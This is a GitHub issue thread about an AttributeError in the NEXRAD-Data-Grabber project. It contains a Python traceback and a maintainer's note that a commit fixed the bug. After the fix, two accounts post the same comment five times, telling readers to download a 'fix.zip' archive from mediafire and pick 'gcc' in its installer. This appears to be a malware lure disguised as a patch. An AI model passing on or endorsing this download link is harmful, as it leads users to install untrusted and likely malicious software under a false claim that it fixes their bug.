### ISSUE TITLE
[BUG] Attribute Error

### ISSUE THREAD

**Issue by nwga-wxrome** [WeathertrackUS/NEXRAD-Data-Grabber#3]
**Describe the bug**
Attribute error when downloading files.

**To Reproduce**
Attempt to download files.

**Expected behavior**
Download files.

**Desktop (please complete the following information):**
 - OS: Windows 11
 - Version Development

**Additional context**
Testing issues.

Traceback (most recent call last):
  File "C:\Users\ecto1\AppData\Local\Programs\Python\Python312\Lib\threading.py", line 1073, in _bootstrap_inner
    self.run()
  File "C:\Users\ecto1\AppData\Local\Programs\Python\Python312\Lib\threading.py", line 1010, in run
    self._target(*self._args, **self._kwargs)
  File "e:\Projects\NEXRAD-Data-Grabber\NEXRAD-Data-Grabber\NEXRAD-File-Grabber\gui.py", line 372, in download_scans
    downloader.download_scans(selected_scans, download_event, download_complete, total_scans, update_progress_bar)
  File "e:\Projects\NEXRAD-Data-Grabber\NEXRAD-Data-Grabber\NEXRAD-File-Grabber\main.py", line 193, in download_scans
    futures = [executor.submit(self._download_scan, scan) for scan in scans]
                               ^^^^^^^^^^^^^^^^^^^
AttributeError: 'NexradDownloader' object has no attribute '_download_scan'. Did you mean: 'download_scan'?

**Comment by WxboySuper** [comment]
Fixed with f6e48b993a76e10d62f39432e3079bee11df7bba

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
